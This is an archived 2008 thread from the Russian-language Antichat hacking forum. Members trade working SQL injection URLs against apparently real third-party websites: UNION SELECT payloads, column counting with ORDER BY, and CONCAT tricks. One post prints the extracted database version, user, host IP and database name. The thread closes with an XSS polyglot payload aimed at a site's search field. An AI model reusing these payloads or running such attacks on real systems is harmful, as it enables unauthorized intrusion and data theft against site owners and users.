ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
24.02.2008, 03:02
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
http://hhunt.ru/clan.php?clan=Clan+Of+The+Black+Hand&city_id=1'
Помогите плз чето не получяеться
|
|
|
25.02.2008, 13:09
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Сообщение от diznt
http://hhunt.ru/clan.php?clan=Clan+Of+The+Black+Hand&city_id=1'
Помогите плз чето не получяеться
По идее должно быть:
Код:
http://hhunt.ru/index.php#http://hhunt.ru/clan.php?clan=Clan+Of+The+Black+Hand&city_id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
так как при запросе city_id=1+order+by+16/* ошибку не выдет, но почему то и не выводит =/
|
|
|
|
25.02.2008, 15:07
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
diznt с чего вы взяли, что сдесь инъекция?
помоему ошибка по нехватке памяти
|
|
|
|
25.02.2008, 15:30
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
2 diznt Вот выполненная иньекция
Код:
http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,version(),7,user(),9,10,11,12,13,database()/*
Но.... есть 2 но....
Во первых после каждого запроса к урл добаляется http://hhunt.ru/index.php#(дальше то что было в урл (http://hhunt.ru/index.php#http://hhunt.ru/comments.php?news_id=9999+uni......))
Во вторых вроде как запрещен доступ к "нужным" таблицам для текуЩего пользователя..... хотя может что и можно вытащить полезное, я дальше не ковырял.... да кстати может там можно файлики читать или еще что.... 
Последний раз редактировалось Red_Red1; 26.02.2008 в 23:11..
Причина: Грамматика хромает :)
|
|
|
|
26.02.2008, 20:02
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 mouse.pro
Сдесь помоему ничего не выйдет ошибка возникает из-за кавычки в запросе ,но возможности влиять на сам запрос нет (Если ошибаюсь,спецы поправьте ,буду рад)
|
|
|
|
27.02.2008, 11:10
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Сайт
Код:
http://www.uvageneration.com/index.php?option=com_simpleboard&func=view&catid=5
Ошибка:
Код:
http://www.uvageneration.com/index.php?option=com_simpleboard&func=view&catid=5+order+by+10/*
Столбцы:
Код:
http://www.uvageneration.com/index.php?option=com_simpleboard&func=view&catid=5+order+by+5/*
Вывод:
Код:
http://www.uvageneration.com/index.php?option=com_simpleboard&func=view&catid=-1+union+select+1,2,3,4,5/*
Почему нет вывода о_О |
|
|
|
27.02.2008, 11:36
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
2 it's my
http://www.uvageneration.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+1,2,3,version(),5/*
чтобы вывести версию мускуля сделал так хх 
-999+union+select+1,2,3,concat(user(),version(),0x3 a,user(),0x3a,database()),5/*
4.1.11-Debian_4sarge7:uvagener24551@217.64.202.205:uvagen er24551
php include через sql инъекцию
Последний раз редактировалось xcedz; 27.02.2008 в 11:40..
|
|
|
|
27.02.2008, 11:43
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
а где ты тут php инклюд увидел?
а данные надо получать с использованием concat причем обязательно чтоб в начале был какой нить левый символ, а то могут быть косяки сравни:
http://www.uvageneration.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(version()),5/*
и
http://www.uvageneration.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,version()),5/*
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 27.02.2008 в 15:59..
|
|
|
|
29.02.2008, 10:16
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
короче вот:
55 столбцов:
http://www.11.be/index.php?option=com_11partners&ptcmd=PD&partnerid =89+order+by+55/*
Но браузер не открывает такой линк =/
Код:
http://www.11.be/index.php?option=com_11partners&ptcmd=PD&partnerid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/*
что можна сделать? |
|
|
|
29.02.2008, 10:55
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
видимо на union так реагирует... да же в поисковике можно набрать просто union и выкент в гугл
http://www.11.be/index.php?searchword=';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
Зато есть xss
Последний раз редактировалось xcedz; 29.02.2008 в 11:11..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
